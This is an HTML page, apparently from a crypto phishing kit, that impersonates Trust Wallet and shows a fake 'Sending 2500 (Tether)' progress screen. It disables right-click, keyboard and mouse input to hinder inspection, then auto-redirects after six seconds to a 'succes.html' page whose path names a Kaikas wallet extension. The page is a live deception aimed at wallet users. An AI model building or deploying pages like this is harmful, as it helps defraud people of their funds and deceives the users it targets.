<!DOCTYPE html>

<html class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>

  <title>Trust wallet</title>
  <meta name="description" content="">
  <link rel="shortcut icon" href="https://img.freepik.com/premium-psd/tether-coin-logo-cryptocurrency-high-resolution-3d-render-transparant_513203-250.jpg">

 <meta name="viewport" content="width=device-width">
<link href="./sending_files/style-8ede3607c73899fd87a40ea034f3dff0.css" rel="stylesheet">

</head>

<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"><!-- uiView: --><div ui-view="" class="ng-scope">


<div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header">
  <div class="so-chunk">
  </div>
</div>

  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == ÞsendConfirm&#39;">



<meta http-equiv="refresh" content=" 6;url=succes.html?unlock/webstore/detail/kaikas/jblndlipeogpafnldhgmapagcccfchpi">
 
 

   <br> <br><br> <br><br> <br>
<center><img src="https://img.freepik.com/premium-psd/tether-coin-logo-cryptocurrency-high-resolution-3d-render-transparant_513203-250.jpg"
  style="margin-top:-5px" width="50px"></center>
  <center><img src="https://www.ascensiongamedev.com/uploads/monthly_2017_06/loader.thumb.gif.d3adbbe2d68f5e2d2f0f5c3ed0e94564.gif" style="margin-top:-5px" width="40px"></center>
 
<center><div class="WalletTokenList__refreshed-message">Balances...</div></center>
<center> <font size="2">Sending 2500 ( Tether )</font><br></center>
  
    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
       

      </div>
    </div><!-- end ngIf: widget.memo -->
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->



</div>
</body></html>
